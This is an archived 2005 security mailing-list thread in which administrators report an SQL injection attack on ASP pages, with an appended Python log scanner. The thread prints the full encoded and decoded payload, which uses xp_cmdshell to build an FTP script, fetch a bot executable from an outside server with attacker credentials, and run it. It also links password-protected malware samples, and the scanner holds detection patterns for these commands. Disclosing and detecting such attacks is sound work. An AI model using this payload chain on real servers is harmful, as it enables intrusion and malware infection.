Security Incidents mailing list archives

Re: SQL injection ... another attack


From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 20 Jan 2005 10:57:12 -0800 (PST)

I think the real issue here is that the SQL Injection
worked....


--- gaurav kumar <gkverma () gmail com> wrote:

my VirusScan (network associates) detected it as
W32/Sdbot.worm.gen


On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
<mducharme () cybergeneration com> wrote:

Hi to the list

today we received the same SQL injection attack
on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection :

http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 Jan. doesn't find anything suspicious.

I'm interested if someone does an analysis on this file.

Have a nice day

Maxime Ducharme
Programmer / Network security specialist

----- Original Message -----
From: "Maxime Ducharme"
<mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General
DShield Discussion List"
<list () lists dshield org>;
<incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: SQL injection worm ?


Hi list,
    we received a particular SQL injection attack on one of our sites.

Attack looks like :
2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20open%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -

HTTP request contains only 2 fields (besides the HTTP method) :
Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site).

Decoded SQL injection looks like :
exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

y.y.y.y is a foreign IP in Europe which hosts FTP and WWW servers.
I sent a notice to this site's sysadmin about the situation.

I have been able to connect to this FTP with the account hahajk/hahaowned
(which does not seem legit to me ...) and download suspicious files.
I mirrored them here :

http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have
also been advised.

I know rbot.exe is known to be Randex worm, but I'd like to have
some other results / analysis.

I also found a "test.asp" file which contains
the Spybot worm.

Weird thing is, I searched for this host's activity on every server
and every firewall we run, and I only see 1 TCP connection, which
is the prepared SQL injection attack, nothing else.

Anybody see similar activity ?

I'm asking since I want to know if we are targeted by someone or
by a worm like Santy that uses search engines to find vulnerable
ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmer / Network security specialist






=====
------------------------------------------
Harlan Carvey, CISSP
"Windows Forensics and Incident Recovery"
http://www.windows-ir.com
http://windowsir.blogspot.com
------------------------------------------
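The thread's log entry hides "exec MASTER..xp_cmdshell" behind percent-encoding (%65%78%65%63 ...), so a substring match on the raw IIS log never fires. As an added example (not code from any poster), a small Python scanner that percent-decodes the cs-uri-query field before matching on the stacked-query prefix, xp_cmdshell and the 80040e14 ODBC error IIS appended to the logged query; the log lines are constructed from the posted entry (payload truncated to its first statement) and the field order is assumed from it, since no #Fields header was posted.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log lines modelled on the entry posted in the thread.
# Assumed field order (no #Fields header was posted): date time c-ip
# cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem
# cs-uri-query sc-status ...  IIS appends ASP error detail to cs-uri-query
# with spaces replaced by underscores, hence the |17|80040e14|... tail.
SAMPLE_LOG = [
    "2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    "id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C"
    "%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C'--|17|80040e14|"
    "[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''."
    " 500 0 0 1395 570 HTTP/1.1 www.example.com - - -",
    # benign request to the same page for contrast
    "2005-01-05 14:40:02 10.0.0.7 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    "id_nouvelle=377 200 0 0 8120 310 HTTP/1.1 www.example.com - - -",
]

# Indicators taken from the decoded payload: quote-break plus stacked EXEC,
# the MASTER.. prefix, xp_cmdshell, the ftp.exe stager, and the ODBC
# syntax-error code the server returned for the malformed request.
INDICATORS = re.compile(
    r"';\s*exec\b|xp_cmdshell|\bmaster\.\.|\bftp\.exe\b|80040e14", re.IGNORECASE)

def decode_query(raw, max_rounds=3):
    """Percent-decode until stable so double-encoded (%25xx) text is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def parse_iis_line(line):
    f = line.split()
    return {"client": f[2], "method": f[8], "stem": f[9],
            "query": f[10], "status": f[11]}

def scan_iis_log(lines):
    """Return one finding per line whose decoded query matches an indicator."""
    findings = []
    for line in lines:
        rec = parse_iis_line(line)
        decoded = decode_query(rec["query"])
        hits = sorted({m.lower() for m in INDICATORS.findall(decoded)})
        if hits:
            findings.append({"client": rec["client"], "stem": rec["stem"],
                             "status": rec["status"], "indicators": hits,
                             "decoded": decoded})
    return findings

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["indicators"])
        print("   ", hit["decoded"][:100])
```

Pairing the decoded-query match with a 500 status and the 80040e14 tail is useful for triage: it marks the attacker's probe that failed on syntax, which often precedes the request that succeeds.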